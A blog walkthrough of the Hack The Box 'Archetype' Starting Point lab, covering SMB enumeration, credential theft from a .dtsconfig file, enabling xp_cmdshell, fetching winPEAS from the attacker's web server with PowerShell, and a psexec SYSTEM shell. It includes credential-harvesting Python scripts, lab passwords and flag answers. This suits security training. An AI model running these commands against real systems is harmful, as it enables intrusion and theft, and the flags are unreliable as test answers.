HTB Labs — Tier 2 — “Archetype” Machine Walkthrough | By: CyberAlp0

Hey Folks, this is CyberAlp0. Back again with a new walkthrough powered by HTB, Starting Point Tier 2, named “Archetype”. This machine is split into a series of tasks that lead you, step by step, to the flags and to solving the machine.
This blog will guide you through solving the tasks one by one and give you a little more background and a hint for each question. These hints will widen your experience and sharpen your mind.
Let’s begin Spawning…
Step 1: Connecting to the Starting Point Labs Servers.
To attack the target machine, you have to be on the same network. You can read my Blog which will guide you step-by-step into connecting to the target machine.
Step 2: Spawning the Machine and Start Solving the Tasks.
Note that the target gets a new IP address every time it is spawned, which is why the commands below do not all show the same 10.129.x.x address. Always use the address shown on the machine page at the time you run the command.
Task 1: Which TCP port is hosting the database server?
Answer: 1433
Walkthrough:
By scanning the target first, we get a pretty good picture of nearly everything running on the machine. Two popular port scanners are Nmap and Rustscan.
Since Nmap is my favorite, I will use it to see which ports are open and which services are listening on them.
nmap -v 10.129.95.187

You can also tell Nmap to detect service versions (-sV) and to run its default script set (-sC), which is what identifies the database product and version:
nmap -sC -sV 10.129.95.187

You will notice that the database is Microsoft SQL Server 2017 and that it is listening on TCP port 1433, the default port for MSSQL.
Note that: this is not MySQL. MySQL is a different product whose default TCP port is 3306; do not mix the two up when answering the question.
Task 2: What is the name of the non-administrative share available over SMB?
Answer: backups
Walkthrough:
Since the server has TCP port 445 open, it is exposing SMB (“Server Message Block”), the Windows file- and printer-sharing protocol. Exposing SMB is not a vulnerability by itself; the weakness here is that the server allows an anonymous (null) session, which lets anyone on the network list the shared folders and, as we will see, read one of them without credentials.
To list the shares anonymously, we type the following command (press Enter when prompted for a password, or add -N to skip the prompt):
smbclient -L 10.129.95.187

We will notice that there are 4 shares on the server. Shares whose name ends with a “$” sign are hidden shares; on Windows these are the default administrative shares (such as C$ and ADMIN$) plus the IPC$ pipe share, and reading them requires administrator credentials. Hence, the only share we can access without a password is the “backups” share.
Note that: a share is a directory on the server that is exposed to SMB clients on the network. On a file server, shares are commonly used to give users network access to their home directories, with each user assigned a home directory of their own.

We have Discussed more about the SMB in the “DANCE” Machine. You may find more information about exploiting SMB through this blog.
Task 3: What is the password identified in the file on the SMB share?
Answer: M3g4c0rp123
Walkthrough:
Making use of the accessible share named “backups”, we connect to it over port 445 with smbclient, again without a password:
smbclient --no-pass //10.129.95.187/backups

Inside the share, ls shows a single file named “prod.dtsconfig”. Download it with the get command (get prod.dtsconfig) and open it locally: it is an SSIS package configuration file, and the connection string it contains carries the database user name and password in clear text.
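The .dtsconfig file is XML, and credentials like the one above hide inside connection strings stored as <ConfiguredValue> text. The following is an added example, not code from the original walkthrough, that parses such a file and pulls out the server, database, user and password, then derives the mssqlclient invocation from the kind of account found (a DOMAIN\name user is a Windows account, which is why the next task uses -windows-auth). The sample document is constructed for this example: only the user name and password come from the walkthrough; the server, catalog, provider and date values are filler.

```python
"""Pull credentials out of an SSIS package configuration (.dtsConfig) file.

Added example, not code from the original walkthrough. SSIS stores package
properties, including full connection strings, as <ConfiguredValue> text under
<Configuration> elements, which is why a "backups" share holding prod.dtsconfig
leaks a database login. The sample document below is constructed for this
example: only the user name and password come from the walkthrough, the
remaining values (server, catalog, provider, dates) are filler.
"""
import xml.etree.ElementTree as ET

# Constructed sample modelled on the dtsConfig layout; not the real file.
SAMPLE_DTSCONFIG = """<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="ARCHETYPE\\sql_svc" GeneratedFromPackageName="Package"
        GeneratedFromPackageID="00000000-0000-0000-0000-000000000000" GeneratedDate="2019-01-20"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property"
      Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""

# Connection-string keywords worth reporting, mapped to the field name used in
# the result. Keywords are case-insensitive and most providers accept both the
# long and the short spelling.
CRED_KEYS = {
    "password": "password", "pwd": "password",
    "user id": "user", "uid": "user",
    "data source": "server", "server": "server",
    "initial catalog": "database", "database": "database",
}


def parse_connection_string(cs):
    """Split 'Key=Value;Key=Value;' into a dict with lower-cased keys.

    Values wrapped in quotes or braces are unwrapped. Values that themselves
    contain ';' (only legal inside quotes/braces) are not handled by this
    simple split, which is fine for the flat strings SSIS writes.
    """
    result = {}
    for part in cs.split(";"):
        key, sep, value = part.partition("=")
        if not sep:
            continue
        value = value.strip()
        if len(value) >= 2 and value[0] + value[-1] in ("''", '""', "{}"):
            value = value[1:-1]
        result[key.strip().lower()] = value
    return result


def extract_credentials(xml_text):
    """Return one record per <ConfiguredValue> whose connection string names a
    user or a password. Each record keeps the SSIS property Path so the
    connection it belongs to can be identified."""
    root = ET.fromstring(xml_text)
    records = []
    for conf in root.iter("Configuration"):
        value_el = conf.find("ConfiguredValue")
        if value_el is None or not value_el.text or "=" not in value_el.text:
            continue
        kv = parse_connection_string(value_el.text)
        rec = {"path": conf.get("Path", "")}
        for keyword, field in CRED_KEYS.items():
            if keyword in kv:
                rec[field] = kv[keyword]
        # Integrated Security=SSPI/True means the package authenticates as the
        # Windows account running it; there is no password to harvest then.
        rec["integrated"] = kv.get("integrated security", "").lower() in ("sspi", "true", "yes")
        if "user" in rec or "password" in rec:
            records.append(rec)
    return records


def mssqlclient_hint(rec):
    """Build the impacket-mssqlclient invocation matching the harvested login.
    A DOMAIN\\name user is a Windows account, so -windows-auth is required;
    a bare name is a SQL login. <target-ip> is a placeholder."""
    user = rec.get("user", "")
    if "\\" in user:
        domain, name = user.split("\\", 1)
        return f"impacket-mssqlclient {domain}/{name}@<target-ip> -windows-auth"
    return f"impacket-mssqlclient {user}@<target-ip>"


if __name__ == "__main__":
    for rec in extract_credentials(SAMPLE_DTSCONFIG):
        print(rec["path"])
        for field in ("server", "database", "user", "password"):
            if field in rec:
                print(f"  {field:9}: {rec[field]}")
        print("  " + mssqlclient_hint(rec))
```

Run it against any .dtsconfig you pull from a share by reading the file into extract_credentials; the Path value tells you which SSIS connection (here “Destination”) the login belongs to, which matters when a package configures several data sources.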

Task 4: What script from Impacket collection can be used to establish an authenticated connection to a Microsoft SQL Server?
Answer: mssqlclient.py
Walkthrough:
First of all, we need to understand what the Impacket collection is. Impacket is a set of Python libraries and example scripts that provide low-level access to network protocols, and it is used heavily in penetration testing.
Impacket was originally developed by Core Security. Its libraries implement protocols such as SMB, MSRPC, LDAP, Kerberos and TDS (the MSSQL wire protocol), and the bundled scripts use them to interact with network services and perform security-related tasks.
Note that: Impacket is open source and can be found on GitHub. It is also installed by default in recent Kali Linux releases, where the scripts are exposed as impacket-* commands (for example impacket-mssqlclient instead of mssqlclient.py).
In the Impacket collection, the script used to establish an authenticated connection to a Microsoft SQL Server is “mssqlclient.py”. It is a Python script that connects to a SQL Server instance, lets you run SQL queries interactively, and offers helper commands for things like enabling xp_cmdshell.
impacket-mssqlclient <DOMAIN>/<username>@<target-ip> -windows-auth
The domain and user name come from prod.dtsconfig: the user is ARCHETYPE/sql_svc and the password is M3g4c0rp123. Because sql_svc is a Windows account (the user ID is written as ARCHETYPE\sql_svc, not as a bare SQL login), the -windows-auth flag is needed so that the client authenticates with Windows authentication rather than SQL Server authentication.

Connect to the server using the Impacket mssqlclient.py command as follows (note the user name is sql_svc, exactly as in the config file):
impacket-mssqlclient ARCHETYPE/sql_svc@10.129.138.22 -windows-auth
You will be asked to enter the password; paste M3g4c0rp123 and press Enter. A successful login drops you at a SQL> prompt.

Task 5: What extended stored procedure of Microsoft SQL Server can be used to spawn a Windows command shell?
Answer: xp_cmdshell
Walkthrough:
In Microsoft SQL Server, the extended stored procedure that can be used to spawn a Windows command shell is called “xp_cmdshell”.
What is meant by an extended stored procedure?
It is a SQL Server feature that lets compiled code (historically a C or C++ DLL loaded into the SQL Server process) be called from T-SQL like a normal stored procedure. The xp_ procedures extend the database engine with functionality that plain SQL cannot provide, such as touching the file system or the operating system.
“xp_cmdshell” is one of these built-in extended stored procedures. It hands a command line to cmd.exe and returns the command’s output as rows, so it gives you the ability to execute operating-system commands from inside SQL Server, running as the account that the SQL Server service runs under.
Bottom line: xp_cmdshell is a channel between the SQL prompt and the Windows operating system. Through it you can run any cmd.exe command, including launching PowerShell.

xp_cmdshell is disabled by default, so the first attempt to use it fails with an error saying the component is turned off. Enabling it requires the sysadmin role, which sql_svc happens to have on this box. mssqlclient.py has a helper command for it (under the hood it runs sp_configure to turn on 'show advanced options' and then 'xp_cmdshell', followed by RECONFIGURE):
enable_xp_cmdshell

To make sure everything works, run a simple Windows command such as whoami through it, e.g. xp_cmdshell "whoami", and check that the output comes back.

Task 6: What script can be used to search possible paths to escalate privileges on Windows hosts?
Answer: winPEAS
Walkthrough:
When we run “whoami” through xp_cmdshell, we see that our commands execute as the low-privileged service account archetype\sql_svc, not as an administrator. Thus, we need to escalate our privileges from this account to a more powerful one.
Walkthrough for using winPEAS to find a privilege-escalation path:
Firstly: download winPEAS (Windows Privilege Escalation Awesome Script) from its GitHub repository.

You can download the release pages that contains the winPEAS script that will be transferred and executed to the target machine through this link.

Secondly: transfer winPEASx64.exe to the target machine.
winPEAS.exe does not escalate privileges by itself; it enumerates the host (services, permissions, credentials left in files, history, registry and so on) and highlights possible paths to escalate. So we will move it to the target and run it there, then act on what it finds.
On Kali, download the release binary with wget and place it in the Apache2 web root at /var/www/html, making sure the apache2 service is running so the target can fetch it from us.


Now the binary can be fetched from http://10.10.14.66/winPEASx64.exe, where 10.10.14.66 is the VPN (tun0) address of the Kali machine; you can confirm it is served correctly by opening that URL in a browser.
We will use xp_cmdshell to run PowerShell on the target, first to download the binary from our web server and then to execute it.
Thirdly: Use xp_cmdshell to download the script on the target machine and execute it.
Step 1: Printing the Working Directory
xp_cmdshell "powershell -c pwd"

Step 2: Listing what’s inside the Directory C:/Users/public
xp_cmdshell "powershell -c dir C:/Users/Public"

Step 3: Downloading the winPEASx64.exe using the PowerShell
xp_cmdshell "powershell -c cd C:/Users/Public; wget http://10.10.14.66/winPEASx64.exe"

You will notice the following error (a NotSupportedException):
wget : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet
Explorer’s first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
In PowerShell, wget is only an alias for Invoke-WebRequest, which by default tries to parse the response as HTML using the Internet Explorer engine. The fix is to tell it to skip that parsing and write the body straight to a file: add -UseBasicParsing as the error suggests, and give an output file name (-o is accepted as an abbreviation of -OutFile) so the downloaded binary is saved on disk:
xp_cmdshell "powershell -c cd C:/Users/Public; wget http://10.10.14.66/winPEASx64.exe -UseBasicParsing -o winPEASx64.exe"


Step 4: Executing the script (and hitting an ApplicationFailedException)
Write the following command in order to execute winPEASx64.exe:
xp_cmdshell "powershell -c cd C:/Users/Public; ./winPEASx64.exe"
You will encounter an error stating that “winPEASx64.exe” is not a valid application for this OS platform. In this walkthrough the workaround is to use the x86 build of winPEAS instead.

An x86 (32-bit) executable runs on both 32-bit and 64-bit Windows (on 64-bit systems it runs under the WOW64 layer), so it is the safer choice when the 64-bit build refuses to start. You will find the x86 build on the same releases page.

Step 5: Downloading the x86 build on the target machine
After placing winPEASx86.exe in /var/www/html on Kali as in the previous steps, download it on the target with the same PowerShell one-liner (note the cd before the wget, otherwise the file lands in the SQL Server service’s working directory instead of C:\Users\Public):
xp_cmdshell "powershell -c cd C:/Users/Public; wget http://10.10.14.66/winPEASx86.exe -UseBasicParsing -o winPEASx86.exe"


Step 6: Executing the x86 build on the target machine
Type the following command to run winPEASx86.exe on the target. It produces a long, colour-coded report; read it through rather than only looking at the end.
xp_cmdshell "powershell -c cd C:/Users/Public; ./winPEASx86.exe"


In the report, winPEAS flags the PowerShell command history of the sql_svc user as interesting. PSReadLine records every interactive PowerShell command, so if an administrator ever typed a password on the command line it is still sitting in this file:
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Task 7: What file contains the administrator’s password?
Answer: ConsoleHost_history.txt
Walkthrough:
By typing the following command, we will be able to list the contents of the text file that contains the admin’s password
xp_cmdshell "powershell -c cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\; type ConsoleHost_history.txt"
Or we can directly type the following
xp_cmdshell "powershell -c type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

The history contains a command in which the administrator typed their password in clear text. The password of the administrator is MEGACORP_4dm1n!!
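Reading one history file by hand is easy; on a real engagement you collect many of them, and the same file is worth scanning from the defensive side too. The following is an added example, not code from the original walkthrough, that scans PSReadLine history text for commands that embed credentials: net use with a password and /user:, net user creating an account with a password, ConvertTo-SecureString -AsPlainText, and explicit -Password / -P / /p: switches. The sample history is constructed for this example and is not the content of the file on Archetype; the administrator password from the walkthrough is reused in it only so the output lines up with the task.

```python
"""Scan PowerShell command history for commands that embed credentials.

Added example, not code from the original walkthrough. PSReadLine writes every
interactive command line to ConsoleHost_history.txt, one command per line.
The sample history below is constructed for this example; it is not the
contents of the file on Archetype.
"""
import re

# Constructed sample: lines 2, 4 and 6 leak a secret, the others do not.
SAMPLE_HISTORY = """\
dir C:\\Users\\Public
net.exe use T: \\\\Archetype\\backups /user:administrator MEGACORP_4dm1n!!
Get-Process sqlservr
$pw = ConvertTo-SecureString 'Summer2019!' -AsPlainText -Force
Invoke-WebRequest http://10.10.14.66/tool.exe -UseBasicParsing -OutFile tool.exe
sqlcmd -S . -U sa -P 'sa-pass-here'
exit
"""

NET_USE = re.compile(r"^net(?:\.exe)?\s+use\s+(?P<rest>.*)$", re.I)

# Patterns for other credential-bearing commands; each names a 'secret' group.
GENERIC = [
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r"ConvertTo-SecureString\s+(?P<secret>'[^']*'|\"[^\"]*\"|\S+)(?=.*-AsPlainText)", re.I)),
    ("explicit password switch",
     re.compile(r"(?:-Password\b|(?<=\s)-P(?=\s)|(?<=\s)/p:)\s*(?P<secret>'[^']*'|\"[^\"]*\"|\S+)", re.I)),
    ("net user <name> <password>",
     re.compile(r"\bnet(?:\.exe)?\s+user\s+(?P<user>\S+)\s+(?P<secret>[^/\s]\S*)", re.I)),
]


def _unquote(s):
    return s[1:-1] if len(s) >= 2 and s[0] == s[-1] and s[0] in "'\"" else s


def _check_net_use(line):
    """net use accepts the password either before or after /user:, so pick the
    one bare token that is not a drive letter, a UNC path, a switch, or the
    '*' placeholder that makes net prompt for the password instead."""
    m = NET_USE.match(line)
    if not m:
        return None
    tokens = m.group("rest").split()
    user = next((t.split(":", 1)[1] for t in tokens if t.lower().startswith("/user:")), None)
    candidates = [t for t in tokens
                  if not t.startswith(("/", "\\\\")) and not re.fullmatch(r"[A-Za-z]:", t) and t != "*"]
    if user is None or not candidates:
        return None
    return {"kind": "net use", "user": user, "secret": candidates[0]}


def _check_generic(line):
    for kind, pattern in GENERIC:
        m = pattern.search(line)
        if m:
            finding = {"kind": kind, "secret": _unquote(m.group("secret"))}
            if "user" in m.groupdict() and m.group("user"):
                finding["user"] = m.group("user")
            return finding
    return None


def scan_history(text):
    """Return one finding per history line that carries a credential, with the
    1-based line number and the offending command attached."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        finding = _check_net_use(line) or _check_generic(line)
        if finding:
            finding.update(line=lineno, command=line)
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        who = f"user={f['user']} " if "user" in f else ""
        print(f"line {f['line']}: [{f['kind']}] {who}secret={f['secret']}")
        print(f"    {f['command']}")
```

Point scan_history at the text of any ConsoleHost_history.txt you collect (the file lives under each user’s AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine). Defenders can run the same scan over those files to find operators who have typed secrets on the command line.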
Task 8: Submitting the user flag
Answer: 3e7b102e78218e935bf3f4951fec21a3
Walkthrough:
Again, we will get help from Impacket. This time we use the “psexec.py” script, which logs in over SMB with the administrator password we just found, drops a service binary into the ADMIN$ share and starts it, giving us a SYSTEM-level shell on the target. You will be prompted for the password (MEGACORP_4dm1n!!).
impacket-psexec Administrator@10.129.70.21

In the resulting shell, read the user flag from the sql_svc user’s desktop:
type C:\Users\sql_svc\Desktop\user.txt

You will find the user.txt, once you type it, you will find that the user flag is
3e7b102e78218e935bf3f4951fec21a3
Task 9: Submitting the root flag
Answer: b91ccec3305e98240082d4474b848528
Walkthrough:
You will find the root flag on the Administrator’s desktop, at the following path: C:\Users\Administrator\Desktop\root.txt (read it with type in the same psexec shell).

The Root Flag of the Archetype Machine is: b91ccec3305e98240082d4474b848528
Hope you enjoyed reading my blog about solving Archetype machine from HTB — Tier 2— Starting Point Phase.
See You in another write-up!